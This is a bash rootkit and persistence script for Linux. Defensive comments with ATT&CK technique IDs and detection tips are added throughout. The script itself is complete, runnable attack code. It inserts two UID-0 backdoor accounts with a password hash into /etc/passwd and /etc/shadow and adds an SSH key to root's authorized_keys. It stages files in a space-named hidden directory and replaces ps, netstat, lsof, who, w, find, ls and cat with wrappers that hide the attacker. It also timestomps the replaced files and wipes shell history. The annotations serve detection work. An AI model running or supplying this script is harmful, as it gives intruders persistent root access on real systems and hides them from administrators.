# NOTE(review): annotated for defenders. The trailing "| |" on each line looks
# like a table-rendering artefact of the page rather than script text.
# TODO | |
# copy binarys to new location, execute from said location. ensure ps command filters out commands | |
#PORT="1337" | |
# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use | |
# Account manipulation (ATT&CK T1136.001): the stock `news` and `list` accounts
# are deleted, then re-inserted at lines 7 and 8 of /etc/passwd and /etc/shadow
# with UID 0, GID 0, /bin/bash as shell and the same SHA-512-crypt ($6$) hash.
# Detection: any passwd entry other than root with UID 0 (for example
# `awk -F: '$3 == 0' /etc/passwd`); service accounts that have a login shell
# and a usable hash in /etc/shadow; a `news` entry whose GECOS field reads
# "list"; file-integrity or auditd watches on both files; leftover
# /tmp/out.txt writes in process or file-access telemetry.
deluser news > /dev/null 2>&1 | |
deluser list > /dev/null 2>&1 | |
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt | |
sed '7ilist:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/shadow && rm /tmp/out.txt | |
sed '8inews:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt | |
sed '8inews:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/shadow && rm /tmp/out.txt | |
# SSH authorized_keys persistence (ATT&CK T1098.004): appends an ssh-dss public
# key labelled root@bt to root's authorized_keys (the key body is elided on
# this page). Detection: compare authorized_keys against a known-good
# inventory; flag entries with unfamiliar comments or a leading space, and
# DSA keys, which current OpenSSH releases no longer accept by default.
mkdir /root/.ssh > /dev/null 2>&1; echo " ssh-dss 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 root@bt" >>/root/.ssh/authorized_keys | |
# create " " dir used for holding actual binarys and other thigns if needed | |
# Hidden staging directory (ATT&CK T1564.001): a directory whose name is a
# single space is created under /usr/lib, and its mtime is set from field 6 of
# the `ls -ld /bin/cat` line so it blends in with neighbouring entries.
# Detection: list /usr/lib with escaped names (e.g. `ls -lab /usr/lib`) or
# search for whitespace-only file names; a directory under /usr/lib that no
# package owns; a stray log.error file in the directory the script ran from.
dirstamp="`ls -ld /bin/cat | awk {'print $6'} 2>./log.error`" | |
echo $dirstamp | |
mkdir /usr/lib/" " | |
touch -d $dirstamp /usr/lib/" " | |
# copy grep over for all other pwnage | |
# The copied grep is the filter every wrapper further down calls, so a second
# grep binary outside its packaged path is itself an indicator.
cp /bin/grep /usr/lib/" "/ | |
# create error log file for testing | |
touch log.error | |
# lsof ownage | |
# Binary replacement (ATT&CK T1014): the real /usr/bin/lsof is moved into
# /usr/lib/" "/ and a bash wrapper written from the here-document takes its
# path. The wrapper drops every output line containing '1337', 'bad_shell2'
# or 'bad_shell3'; `touch -d` then resets the wrapper's mtime (T1070.006).
# Detection: `file /usr/bin/lsof` reporting a shell script instead of an ELF
# binary; package verification (debsums or dpkg --verify) failing for the
# path; a ctime newer than the mtime, because touch cannot set ctime.
lsofstamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`" | |
echo $lsofstamp | |
touch ./lsof | |
chmod 755 ./lsof | |
read -d '' lsof <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/lsof $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$lsof" > lsof | |
mv /usr/bin/lsof /usr/lib/" "/ | |
mv ./lsof /usr/bin/ | |
touch -d $lsofstamp /usr/bin/lsof | |
# Netstat ownage | |
# Same replacement pattern applied to /bin/netstat: the original is moved to
# /usr/lib/" "/ and a bash wrapper filters out lines containing '1337',
# 'bad_shell2' or 'bad_shell3', so a listener on a port matching 1337 would
# not appear in netstat output on this host.
# Detection: do not trust on-host netstat output during triage; compare with
# /proc/net/tcp, `ss` from trusted media, or an external port scan, and check
# that /bin/netstat is an ELF binary matching its package checksum.
netstatstamp="`ls -l /bin/netstat 2>log.error | awk {'print $6'}`" | |
echo $netstatstamp | |
touch ./netstat | |
chmod 755 ./netstat | |
read -d '' netstat <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/netstat $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$netstat" > netstat | |
mv /bin/netstat /usr/lib/" "/ | |
mv ./netstat /bin/ | |
touch -d $netstatstamp /bin/netstat | |
# ps command hack | |
# /bin/ps is moved to /usr/lib/" "/ and replaced by a bash wrapper that removes
# output lines containing '1337', 'bad_shell2' or 'bad_shell3', hiding any
# process whose listing matches those strings.
# Detection: enumerate /proc directly or use statically linked tools from
# trusted media and compare with `ps` output; a mismatch in process counts,
# or /bin/ps being a script rather than an ELF binary, indicates tampering.
psstamp="`ls -l /bin/ps 2>log.error | awk {'print $6'}`" | |
echo $psstamp | |
touch ./ps | |
chmod 755 ./ps | |
read -d '' ps <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/ps $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$ps" > ps | |
mv /bin/ps /usr/lib/" "/ | |
mv ./ps /bin/ | |
touch -d $psstamp /bin/ps | |
# who command hack | |
# /usr/bin/who is moved to /usr/lib/" "/ and replaced by a bash wrapper that
# filters lines containing '1337', 'bad_shell2' or 'bad_shell3' from the
# session listing.
# Detection: cross-check logged-in sessions against sshd/auth logs shipped
# off-host and the raw utmp/wtmp records; verify /usr/bin/who against its
# package checksum and confirm it is an ELF binary.
whostamp="`ls -l /usr/bin/who 2>log.error | awk {'print $6'}`" | |
echo $whostamp | |
touch ./who | |
chmod 755 ./who | |
read -d '' who <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/who $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$who" > who | |
mv /usr/bin/who /usr/lib/" "/ | |
mv ./who /usr/bin/ | |
touch -d $whostamp /usr/bin/who | |
# w command hack | |
# /usr/bin/w is moved to /usr/lib/" "/ and replaced by a bash wrapper applying
# the same three grep -v filters ('1337', 'bad_shell2', 'bad_shell3'). The
# wrapper text is held in the variable `ww` before being written to ./w.
# Detection: as with the other replaced tools, a system utility that is a
# short bash script piping into a grep at an unusual path is the indicator;
# package verification and ctime/mtime comparison both expose it.
wstamp="`ls -l /usr/bin/w 2>log.error | awk {'print $6'}`" | |
echo $wstamp | |
touch ./w | |
chmod 755 ./w | |
read -d '' ww <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/w $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$ww" > w | |
mv /usr/bin/w /usr/lib/" "/ | |
mv ./w /usr/bin/ | |
touch -d $wstamp /usr/bin/w | |
# find hack | |
# /usr/bin/find is moved to /usr/lib/" "/ and replaced by a bash wrapper that
# drops result lines containing '1337', 'bad_shell2' or 'bad_shell3', so
# file-system searches run with the on-host find omit matching paths.
# Detection: run integrity sweeps from trusted media or an offline image
# rather than the host's own find; verify /usr/bin/find against its package
# checksum; look for `find` invocations whose parent is a bash wrapper.
findstamp="`ls -l /usr/bin/find 2>log.error | awk {'print $6'}`" | |
echo $findstamp | |
touch ./find | |
chmod 755 ./find | |
read -d '' find <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/find $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$find" > find | |
mv /usr/bin/find /usr/lib/" "/ | |
mv ./find /usr/bin/ | |
touch -d $findstamp /usr/bin/find | |
# tcpdump hack | |
# NOTE(review): despite the heading above, this section operates on /bin/ls,
# not tcpdump. /bin/ls is moved to /usr/lib/" "/ and replaced by a bash
# wrapper that filters lines containing '1337', 'bad_shell2' or 'bad_shell3'.
# Detection: directory listings produced by the host's ls cannot be trusted;
# compare with `echo *`, `stat` on known paths, or an offline mount, and
# verify /bin/ls against its package checksum.
lsstamp="`ls -l /bin/ls 2>log.error | awk {'print $6'}`" | |
echo $lsstamp | |
touch ./ls | |
chmod 755 ./ls | |
read -d '' ls <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/ls $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$ls" > ls | |
mv /bin/ls /usr/lib/" "/ | |
mv ./ls /bin/ | |
touch -d $lsstamp /bin/ls | |
# Remove stuff | |
# Rewrites the invoking user's ~/.bashrc without its `alias ls`, `alias ll`,
# `alias la` and `alias l=` lines.
# NOTE(review): the pipeline reads and redirects to the same file, so the
# file may be left truncated; an unexpectedly empty or alias-less .bashrc is
# worth recording during triage.
cat ~/.bashrc | /usr/lib/" "/grep -v "alias ls" | /usr/lib/" "/grep -v "alias ll" | /usr/lib/" "/grep -v "alias la" | /usr/lib/" "/grep -v "alias l=" > ~/.bashrc | |
#cat ownage | |
# /bin/cat is moved to /usr/lib/" "/ and replaced by a bash wrapper that drops
# lines containing 'list', 'news' or 'bad_shell3'. Those first two strings
# match the account names inserted into /etc/passwd and /etc/shadow earlier
# in this script, so `cat /etc/passwd` on the host would not show them.
# Detection: read account databases without cat (e.g. `getent passwd`, or a
# pager or editor); note that the wrapper also strips unrelated lines
# containing "list" or "news" from any file, which is an observable side
# effect; verify /bin/cat against its package checksum.
catstamp="`ls -l /bin/cat 2>log.error | awk {'print $6'}`" | |
echo $catstamp | |
touch ./cat | |
chmod 755 ./cat | |
read -d '' cat <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/cat $@ | /usr/lib/" "/grep -v 'list' | /usr/lib/" "/grep -v 'news' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$cat" > cat | |
mv /bin/cat /usr/lib/" "/ | |
mv ./cat /bin/ | |
touch -d $catstamp /bin/cat | |
# clear out history | |
# Command-history removal (ATT&CK T1070.003): clears the in-memory history,
# unsets HISTFILE so the session is not written on exit, and deletes
# ~/.bash_history.
# Detection: a missing or zero-length .bash_history for an account that is
# used interactively; rely on auditd execve records or command logging
# shipped off-host rather than shell history, which the user controls.
history -c | |
unset HISTFILE | |
rm -rf ~/.bash_history > /dev/null 2>&1 |